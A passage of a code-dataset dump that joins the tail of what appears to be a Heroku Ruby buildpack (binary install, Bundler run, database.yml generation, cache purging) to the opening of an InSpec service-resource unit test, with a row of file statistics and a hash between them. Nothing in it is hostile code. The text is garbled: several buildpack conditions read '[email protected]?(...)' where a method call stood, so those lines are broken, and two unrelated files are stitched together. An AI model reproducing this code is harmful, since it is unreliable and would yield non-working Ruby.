instrument 'ruby.install_binaries' do
binaries.each {|binary| install_binary(binary) }
Dir["bin/*"].each {|path| run("chmod +x #{path}") }
end
end
# vendors individual binary into the slug
# @param [String] name of the binary package from S3.
# Example: https://s3.amazonaws.com/language-pack-ruby/node-0.4.7.tgz, where name is "node-0.4.7"
def install_binary(name)
topic "Installing #{name}"
bin_dir = "bin"
FileUtils.mkdir_p bin_dir
Dir.chdir(bin_dir) do |dir|
if name.match(/^node\-/)
@node_installer.install
# need to set PATH here b/c `node-gyp` can change the CWD, but still depends on executing node.
# the current PATH is relative, but it needs to be absolute for this.
# doing this here also prevents it from being exported during runtime
node_bin_path = File.absolute_path(".")
# this needs to be set after so other binaries in bin/ don't take precedence"
ENV["PATH"] = "#{ENV["PATH"]}:#{node_bin_path}"
elsif name.match(/^yarn\-/)
FileUtils.mkdir_p("../vendor")
Dir.chdir("../vendor") do |vendor_dir|
@yarn_installer.install
yarn_path = File.absolute_path("#{vendor_dir}/#{@yarn_installer.binary_path}")
ENV["PATH"] = "#{yarn_path}:#{ENV["PATH"]}"
end
else
@fetchers[:buildpack].fetch_untar("#{name}.tgz")
end
end
end
# removes a binary from the slug
# @param [String] relative path of the binary on the slug
def uninstall_binary(path)
FileUtils.rm File.join('bin', File.basename(path)), :force => true
end
def load_default_cache?
new_app? && ruby_version.default?
end
# loads a default bundler cache for new apps to speed up initial bundle installs
def load_default_cache
instrument "ruby.load_default_cache" do
if false # load_default_cache?
puts "New app detected loading default bundler cache"
patchlevel = run("ruby -e 'puts RUBY_PATCHLEVEL'").chomp
cache_name = "#{LanguagePack::RubyVersion::DEFAULT_VERSION}-p#{patchlevel}-default-cache"
@fetchers[:buildpack].fetch_untar("#{cache_name}.tgz")
end
end
end
# install libyaml into the LP to be referenced for psych compilation
# @param [String] tmpdir to store the libyaml files
def install_libyaml(dir)
return false if stack_not_14_not_16?
instrument 'ruby.install_libyaml' do
FileUtils.mkdir_p dir
Dir.chdir(dir) do
@fetchers[:buildpack].fetch_untar("#{@stack}/#{LIBYAML_PATH}.tgz")
end
end
end
# remove `vendor/bundle` that comes from the git repo
# in case there are native ext.
# users should be using `bundle pack` instead.
# https://github.com/heroku/heroku-buildpack-ruby/issues/21
def remove_vendor_bundle
if File.exists?("vendor/bundle")
warn(<<-WARNING)
Removing `vendor/bundle`.
Checking in `vendor/bundle` is not supported. Please remove this directory
and add it to your .gitignore. To vendor your gems with Bundler, use
`bundle pack` instead.
WARNING
FileUtils.rm_rf("vendor/bundle")
end
end
def bundler_binstubs_path
"vendor/bundle/bin"
end
def bundler_path
@bundler_path ||= "#{slug_vendor_base}/gems/#{bundler.dir_name}"
end
def write_bundler_shim(path)
FileUtils.mkdir_p(path)
shim_path = "#{path}/bundle"
File.open(shim_path, "w") do |file|
file.print <<-BUNDLE
#!/usr/bin/env ruby
require 'rubygems'
version = "#{bundler.version}"
if ARGV.first
str = ARGV.first
str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
version = $1
ARGV.shift
end
end
if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('bundler', 'bundle', version)
else
gem "bundler", version
load Gem.bin_path("bundler", "bundle", version)
end
BUNDLE
end
FileUtils.chmod(0755, shim_path)
end
# runs bundler to install the dependencies
def build_bundler(default_bundle_without)
instrument 'ruby.build_bundler' do
topic("Removing BUNDLED WITH version in the Gemfile.lock")
contents = File.read("Gemfile.lock")
File.open("Gemfile.lock", "w") do |f|
f.write contents.sub(/^BUNDLED WITH$(\r?\n) (?<major>\d+)\.\d+\.\d+/m, '')
end
log("bundle") do
bundle_without = env("BUNDLE_WITHOUT") || default_bundle_without
bundle_bin = "bundle"
bundle_command = "#{bundle_bin} install --without #{bundle_without} --path vendor/bundle --binstubs #{bundler_binstubs_path}"
bundle_command << " -j4"
if File.exist?("#{Dir.pwd}/.bundle/config")
warn(<<-WARNING, inline: true)
You have the `.bundle/config` file checked into your repository
It contains local state like the location of the installed bundle
as well as configured git local gems, and other settings that should
not be shared between multiple checkouts of a single repo. Please
remove the `.bundle/` folder from your repo and add it to your `.gitignore` file.
https://devcenter.heroku.com/articles/bundler-configuration
WARNING
end
if bundler.windows_gemfile_lock?
warn(<<-WARNING, inline: true)
Removing `Gemfile.lock` because it was generated on Windows.
Bundler will do a full resolve so native gems are handled properly.
This may result in unexpected gem versions being used in your app.
In rare occasions Bundler may not be able to resolve your dependencies at all.
https://devcenter.heroku.com/articles/bundler-windows-gemfile
WARNING
log("bundle", "has_windows_gemfile_lock")
File.unlink("Gemfile.lock")
else
# using --deployment is preferred if we can
bundle_command += " --deployment"
end
topic("Installing dependencies using bundler #{bundler.version}")
load_bundler_cache
bundler_output = ""
bundle_time = nil
env_vars = {}
Dir.mktmpdir("libyaml-") do |tmpdir|
libyaml_dir = "#{tmpdir}/#{LIBYAML_PATH}"
install_libyaml(libyaml_dir)
# need to setup compile environment for the psych gem
yaml_include = File.expand_path("#{libyaml_dir}/include").shellescape
yaml_lib = File.expand_path("#{libyaml_dir}/lib").shellescape
pwd = Dir.pwd
bundler_path = "#{pwd}/#{slug_vendor_base}/gems/#{bundler.dir_name}/lib"
# we need to set BUNDLE_CONFIG and BUNDLE_GEMFILE for
# codon since it uses bundler.
env_vars["BUNDLE_GEMFILE"] = "#{pwd}/Gemfile"
env_vars["BUNDLE_CONFIG"] = "#{pwd}/.bundle/config"
env_vars["CPATH"] = noshellescape("#{yaml_include}:$CPATH")
env_vars["CPPATH"] = noshellescape("#{yaml_include}:$CPPATH")
env_vars["LIBRARY_PATH"] = noshellescape("#{yaml_lib}:$LIBRARY_PATH")
env_vars["RUBYOPT"] = syck_hack
env_vars["NOKOGIRI_USE_SYSTEM_LIBRARIES"] = "true"
env_vars["BUNDLE_DISABLE_VERSION_CHECK"] = "true"
env_vars["JAVA_HOME"] = noshellescape("#{pwd}/$JAVA_HOME") if ruby_version.jruby?
env_vars["BUNDLER_LIB_PATH"] = "#{bundler_path}" if ruby_version.ruby_version == "1.8.7"
env_vars["BUNDLE_DISABLE_VERSION_CHECK"] = "true"
puts "Running: #{bundle_command}"
instrument "ruby.bundle_install" do
bundle_time = Benchmark.realtime do
bundler_output << pipe("#{bundle_command} --no-clean", out: "2>&1", env: env_vars, user_env: true)
end
end
end
if $?.success?
puts "Bundle completed (#{"%.2f" % bundle_time}s)"
log "bundle", :status => "success"
puts "Cleaning up the bundler cache."
instrument "ruby.bundle_clean" do
# Only show bundle clean output when not using default cache
if load_default_cache?
run("#{bundle_bin} clean > /dev/null", user_env: true, env: env_vars)
else
pipe("#{bundle_bin} clean", out: "2> /dev/null", user_env: true, env: env_vars)
end
end
@bundler_cache.store
# Keep gem cache out of the slug
FileUtils.rm_rf("#{slug_vendor_base}/cache")
else
mcount "fail.bundle.install"
log "bundle", :status => "failure"
error_message = "Failed to install gems via Bundler."
puts "Bundler Output: #{bundler_output}"
if bundler_output.match(/An error occurred while installing sqlite3/)
mcount "fail.sqlite3"
error_message += <<-ERROR
Detected sqlite3 gem which is not supported on Heroku:
https://devcenter.heroku.com/articles/sqlite3
ERROR
end
if bundler_output.match(/but your Gemfile specified/)
mcount "fail.ruby_version_mismatch"
error_message += <<-ERROR
Detected a mismatch between your Ruby version installed and
Ruby version specified in Gemfile or Gemfile.lock. You can
correct this by running:
$ bundle update --ruby
$ git add Gemfile.lock
$ git commit -m "update ruby version"
If this does not solve the issue please see this documentation:
https://devcenter.heroku.com/articles/ruby-versions#your-ruby-version-is-x-but-your-gemfile-specified-y
ERROR
end
error error_message
end
end
end
end
def post_bundler
instrument "ruby.post_bundler" do
Dir[File.join(slug_vendor_base, "**", ".git")].each do |dir|
FileUtils.rm_rf(dir)
end
bundler.clean
end
end
# RUBYOPT line that requires syck_hack file
# @return [String] require string if needed or else an empty string
def syck_hack
instrument "ruby.syck_hack" do
syck_hack_file = File.expand_path(File.join(File.dirname(__FILE__), "../../vendor/syck_hack"))
rv = run_stdout('ruby -e "puts RUBY_VERSION"').chomp
# < 1.9.3 includes syck, so we need to use the syck hack
if Gem::Version.new(rv) < Gem::Version.new("1.9.3")
"-r#{syck_hack_file}"
else
""
end
end
end
# writes ERB based database.yml for Rails. The database.yml uses the DATABASE_URL from the environment during runtime.
def create_database_yml
instrument 'ruby.create_database_yml' do
return false unless File.directory?("config")
return false if bundler.has_gem?('activerecord') && bundler.gem_version('activerecord') >= Gem::Version.new('4.1.0.beta1')
log("create_database_yml") do
topic("Writing config/database.yml to read from DATABASE_URL")
File.open("config/database.yml", "w") do |file|
file.puts <<-DATABASE_YML
<%
require 'cgi'
require 'uri'
begin
uri = URI.parse(ENV["DATABASE_URL"])
rescue URI::InvalidURIError
raise "Invalid DATABASE_URL"
end
raise "No RACK_ENV or RAILS_ENV found" unless ENV["RAILS_ENV"] || ENV["RACK_ENV"]
def attribute(name, value, force_string = false)
if value
value_string =
if force_string
'"' + value + '"'
else
value
end
"\#{name}: \#{value_string}"
else
""
end
end
adapter = uri.scheme
adapter = "postgresql" if adapter == "postgres"
database = (uri.path || "").split("/")[1]
username = uri.user
password = uri.password
host = uri.host
port = uri.port
params = CGI.parse(uri.query || "")
%>
<%= ENV["RAILS_ENV"] || ENV["RACK_ENV"] %>:
<%= attribute "adapter", adapter %>
<%= attribute "database", database %>
<%= attribute "username", username %>
<%= attribute "password", password, true %>
<%= attribute "host", host %>
<%= attribute "port", port %>
<% params.each do |key, value| %>
<%= key %>: <%= value.first %>
<% end %>
DATABASE_YML
end
end
end
end
def rake
@rake ||= begin
rake_gem_available = bundler.has_gem?("rake") || ruby_version.rake_is_vendored?
raise_on_fail = bundler.gem_version('railties') && bundler.gem_version('railties') > Gem::Version.new('3.x')
topic "Detecting rake tasks"
rake = LanguagePack::Helpers::RakeRunner.new(rake_gem_available)
rake.load_rake_tasks!({ env: rake_env }, raise_on_fail)
rake
end
end
def rake_env
if database_url
{ "DATABASE_URL" => database_url }
else
{}
end.merge(user_env_hash)
end
def database_url
env("DATABASE_URL") if env("DATABASE_URL")
end
# executes the block with GIT_DIR environment variable removed since it can mess with the current working directory git thinks it's in
# @param [block] block to be executed in the GIT_DIR free context
def allow_git(&blk)
git_dir = ENV.delete("GIT_DIR") # can mess with bundler
blk.call
ENV["GIT_DIR"] = git_dir
end
# decides if we need to enable the dev database addon
# @return [Array] the database addon if the pg gem is detected or an empty Array if it isn't.
def add_dev_database_addon
pg_adapters.any? {|a| bundler.has_gem?(a) } ? ['heroku-postgresql'] : []
end
def pg_adapters
[
"pg",
"activerecord-jdbcpostgresql-adapter",
"jdbc-postgres",
"jdbc-postgresql",
"jruby-pg",
"rjack-jdbc-postgres",
"tgbyte-activerecord-jdbcpostgresql-adapter"
]
end
# decides if we need to install the node.js binary
# @note execjs will blow up if no JS RUNTIME is detected and is loaded.
# @return [Array] the node.js binary path if we need it or an empty Array
def add_node_js_binary
if (bundler.has_gem?('execjs') || bundler.has_gem?('webpacker')) && node_not_preinstalled?
[@node_installer.binary_path]
else
[]
end
end
def add_yarn_binary
bundler.has_gem?('webpacker') && yarn_not_preinstalled? ? [@yarn_installer.name] : []
end
def has_yarn_binary?
add_yarn_binary.any?
end
# checks if node.js is installed via the official heroku-buildpack-nodejs using multibuildpack
# @return String if it's detected and false if it isn't
def node_preinstall_bin_path
return @node_preinstall_bin_path if defined?(@node_preinstall_bin_path)
legacy_path = "#{Dir.pwd}/#{NODE_BP_PATH}"
path = run("which node")
if path && $?.success?
@node_preinstall_bin_path = path
elsif run("#{legacy_path}/node -v") && $?.success?
@node_preinstall_bin_path = legacy_path
else
@node_preinstall_bin_path = false
end
end
alias :node_js_installed? :node_preinstall_bin_path
def node_not_preinstalled?
!node_js_installed?
end
def yarn_preinstall_bin_path
return @yarn_preinstall_bin_path if defined?(@yarn_preinstall_bin_path)
path = run("which yarn")
if path && $?.success?
@yarn_preinstall_bin_path = path
else
@yarn_preinstall_bin_path = false
end
end
def yarn_not_preinstalled?
!yarn_preinstall_bin_path
end
def run_assets_precompile_rake_task
instrument 'ruby.run_assets_precompile_rake_task' do
precompile = rake.task("assets:precompile")
return true unless precompile.is_defined?
topic "Precompiling assets"
precompile.invoke(env: rake_env)
if precompile.success?
puts "Asset precompilation completed (#{"%.2f" % precompile.time}s)"
else
precompile_fail(precompile.output)
end
end
end
def precompile_fail(output)
mcount "fail.assets_precompile"
log "assets_precompile", :status => "failure"
msg = "Precompiling assets failed.\n"
if output.match(/(127\.0\.0\.1)|(org\.postgresql\.util)/)
msg << "Attempted to access a nonexistent database:\n"
msg << "https://devcenter.heroku.com/articles/pre-provision-database\n"
end
sprockets_version = bundler.gem_version('sprockets')
if output.match(/Sprockets::FileNotFound/) && (sprockets_version < Gem::Version.new('4.0.0.beta7') && sprockets_version > Gem::Version.new('4.0.0.beta4'))
mcount "fail.assets_precompile.file_not_found_beta"
msg << "If you have this file in your project\n"
msg << "try upgrading to Sprockets 4.0.0.beta7 or later:\n"
msg << "https://github.com/rails/sprockets/pull/547\n"
end
error msg
end
def bundler_cache
"vendor/bundle"
end
def load_bundler_cache
instrument "ruby.load_bundler_cache" do
cache.load "vendor"
full_ruby_version = run_stdout(%q(ruby -v)).chomp
rubygems_version = run_stdout(%q(gem -v)).chomp
heroku_metadata = "vendor/heroku"
old_rubygems_version = nil
ruby_version_cache = "ruby_version"
buildpack_version_cache = "buildpack_version"
bundler_version_cache = "bundler_version"
rubygems_version_cache = "rubygems_version"
stack_cache = "stack"
# bundle clean does not remove binstubs
FileUtils.rm_rf("vendor/bundler/bin")
old_rubygems_version = @metadata.read(ruby_version_cache).chomp if @metadata.exists?(ruby_version_cache)
old_stack = @metadata.read(stack_cache).chomp if @metadata.exists?(stack_cache)
old_stack ||= DEFAULT_LEGACY_STACK
stack_change = old_stack != @stack
convert_stack = @bundler_cache.old?
@bundler_cache.convert_stack(stack_change) if convert_stack
if !new_app? && stack_change
puts "Purging Cache. Changing stack from #{old_stack} to #{@stack}"
purge_bundler_cache(old_stack)
elsif !new_app? && !convert_stack
@bundler_cache.load
end
# fix bug from v37 deploy
if File.exists?("vendor/ruby_version")
puts "Broken cache detected. Purging build cache."
cache.clear("vendor")
FileUtils.rm_rf("vendor/ruby_version")
purge_bundler_cache
# fix bug introduced in v38
elsif [email protected]?(buildpack_version_cache) && @metadata.exists?(ruby_version_cache)
puts "Broken cache detected. Purging build cache."
purge_bundler_cache
elsif (@bundler_cache.exists? || @bundler_cache.old?) && @metadata.exists?(ruby_version_cache) && full_ruby_version != @metadata.read(ruby_version_cache).chomp
puts "Ruby version change detected. Clearing bundler cache."
puts "Old: #{@metadata.read(ruby_version_cache).chomp}"
puts "New: #{full_ruby_version}"
purge_bundler_cache
end
# fix git gemspec bug from Bundler 1.3.0+ upgrade
if File.exists?(bundler_cache) && [email protected]?(bundler_version_cache) && !run("find vendor/bundle/*/*/bundler/gems/*/ -name *.gemspec").include?("No such file or directory")
puts "Old bundler cache detected. Clearing bundler cache."
purge_bundler_cache
end
# fix for https://github.com/heroku/heroku-buildpack-ruby/issues/86
if ([email protected]?(rubygems_version_cache) ||
(old_rubygems_version == "2.0.0" && old_rubygems_version != rubygems_version)) &&
@metadata.exists?(ruby_version_cache) && @metadata.read(ruby_version_cache).chomp.include?("ruby 2.0.0p0")
puts "Updating to rubygems #{rubygems_version}. Clearing bundler cache."
purge_bundler_cache
end
# fix for https://github.com/sparklemotion/nokogiri/issues/923
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 76
puts "Fixing nokogiri install. Clearing bundler cache."
puts "See https://github.com/sparklemotion/nokogiri/issues/923."
purge_bundler_cache
end
# recompile nokogiri to use new libyaml
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 99 && bundler.has_gem?("psych")
puts "Need to recompile psych for CVE-2013-6393. Clearing bundler cache."
puts "See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737076."
purge_bundler_cache
end
# recompile gems for libyaml 0.1.7 update
if @metadata.exists?(buildpack_version_cache) && (bv = @metadata.read(buildpack_version_cache).sub('v', '').to_i) && bv != 0 && bv <= 147 &&
(@metadata.exists?(ruby_version_cache) && @metadata.read(ruby_version_cache).chomp.match(/ruby 2\.1\.(9|10)/) ||
bundler.has_gem?("psych")
)
puts "Need to recompile gems for CVE-2014-2014-9130. Clearing bundler cache."
puts "See https://devcenter.heroku.com/changelog-items/1016."
purge_bundler_cache
end
FileUtils.mkdir_p(heroku_metadata)
@metadata.write(ruby_version_cache, full_ruby_version, false)
@metadata.write(buildpack_version_cache, BUILDPACK_VERSION, false)
@metadata.write(bundler_version_cache, bundler.version, false)
@metadata.write(rubygems_version_cache, rubygems_version, false)
@metadata.write(stack_cache, @stack, false)
@metadata.save
end
end
def purge_bundler_cache(stack = nil)
instrument "ruby.purge_bundler_cache" do
@bundler_cache.clear(stack)
# need to reinstall language pack gems
install_bundler_in_app
end
end
end
| 32.306729 | 185 | 0.677679 |
1a5552a70e89769225e22ef6198451d7b3a6a687 | 20,093 | # encoding: utf-8
# author: Christoph Hartmann
# author: Dominik Richter
require 'helper'
require 'inspec/resource'
require 'hashie'
describe 'Inspec::Resources::Service' do
let(:runlevels) { {0=>false, 1=>false, 2=>true, 3=>true, 4=>true, 5=>true, 6=>false} }
# windows
it 'verify service parsing' do
resource = MockLoader.new(:windows).load_resource('service', 'dhcp')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'windows'
_(resource.name).must_equal 'dhcp'
_(resource.description).must_equal 'DHCP Client'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.startmode). must_equal 'Auto'
_(resource.params).must_equal params
end
# ubuntu 14.04 with upstart
it 'verify ubuntu service parsing' do
resource = MockLoader.new(:ubuntu1404).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify ubuntu service parsing with default upstart_service' do
resource = MockLoader.new(:ubuntu1404).load_resource('upstart_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# ubuntu 15.04 with systemd
it 'verify ubuntu service parsing' do
resource = MockLoader.new(:ubuntu1504).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.SubState).must_equal 'running'
end
it 'verify ubuntu service parsing with default systemd_service' do
resource = MockLoader.new(:ubuntu1504).load_resource('systemd_service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# linux mint 17 with upstart
it 'verify mint service parsing' do
resource = MockLoader.new(:mint17).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify mint service parsing with default upstart_service' do
resource = MockLoader.new(:mint17).load_resource('upstart_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# mint 18 with systemd
it 'verify mint service parsing' do
resource = MockLoader.new(:mint18).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.SubState).must_equal 'running'
end
it 'verify mint service parsing with default systemd_service' do
resource = MockLoader.new(:mint18).load_resource('systemd_service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# Amazon Linux
it 'verify amazon linux service parsing' do
resource = MockLoader.new(:amazon).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'upstart'
_(resource.name).must_equal 'ssh'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_be_nil
end
# Amazon Linux 2
it 'verify amazon linux 2 service parsing' do
resource = MockLoader.new(:amazon2).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# centos 6 with sysv
it 'verify centos 6 service parsing' do
resource = MockLoader.new(:centos6).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.SubState).must_be_nil
end
it 'verify centos 6 service parsing with default sysv_service' do
resource = MockLoader.new(:centos6).load_resource('sysv_service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# centos 7 with systemd
it 'verify centos 7 service parsing' do
resource = MockLoader.new(:centos7).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify centos 7 service parsing with systemd_service and service_ctl override' do
resource = MockLoader.new(:centos7).load_resource('systemd_service', 'sshd', '/path/to/systemctl')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'UnitFileState' => 'enabled', 'SubState' => 'running' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify centos 7 service parsing with static loaded service' do
resource = MockLoader.new(:centos7).load_resource('service', 'dbus')
params = Hashie::Mash.new({ 'Description' => 'D-Bus System Message Bus', 'Id' => 'dbus.service', 'LoadState' => 'loaded', 'Names' => 'messagebus.service dbus.service', 'SubState' => 'running', 'UnitFileState' => 'static' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'dbus.service'
_(resource.description).must_equal 'D-Bus System Message Bus'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_equal 'static'
end
# cloudlinux 7 with systemd
it 'verify cloudlinux 7 service parsing' do
resource = MockLoader.new(:cloudlinux).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify cloudlinux 7 service parsing with systemd_service and service_ctl override' do
resource = MockLoader.new(:cloudlinux).load_resource('systemd_service', 'sshd', '/path/to/systemctl')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'UnitFileState' => 'enabled', 'SubState' => 'running' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify cloudlinux 7 service parsing with static loaded service' do
resource = MockLoader.new(:cloudlinux).load_resource('service', 'dbus')
params = Hashie::Mash.new({ 'Description' => 'D-Bus System Message Bus', 'Id' => 'dbus.service', 'LoadState' => 'loaded', 'Names' => 'messagebus.service dbus.service', 'SubState' => 'running', 'UnitFileState' => 'static' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'dbus.service'
_(resource.description).must_equal 'D-Bus System Message Bus'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_equal 'static'
end
# freebsd
it 'verify freebsd10 service parsing' do
resource = MockLoader.new(:freebsd10).load_resource('service', 'sendmail')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'bsd-init'
_(resource.name).must_equal 'sendmail'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify freebsd10 service parsing with default bsd_service' do
resource = MockLoader.new(:freebsd10).load_resource('bsd_service', 'sendmail')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'bsd-init'
_(resource.name).must_equal 'sendmail'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# arch linux with systemd
it 'verify arch linux service parsing' do
resource = MockLoader.new(:arch).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# coreos linux with systemd
it 'verify coreos linux service parsing' do
resource = MockLoader.new(:coreos).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 7 with systemv
it 'verify debian 7 service parsing' do
resource = MockLoader.new(:debian7).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 8 with systemd
it 'verify debian 8 service parsing' do
resource = MockLoader.new(:debian8).load_resource('service', 'sshd')
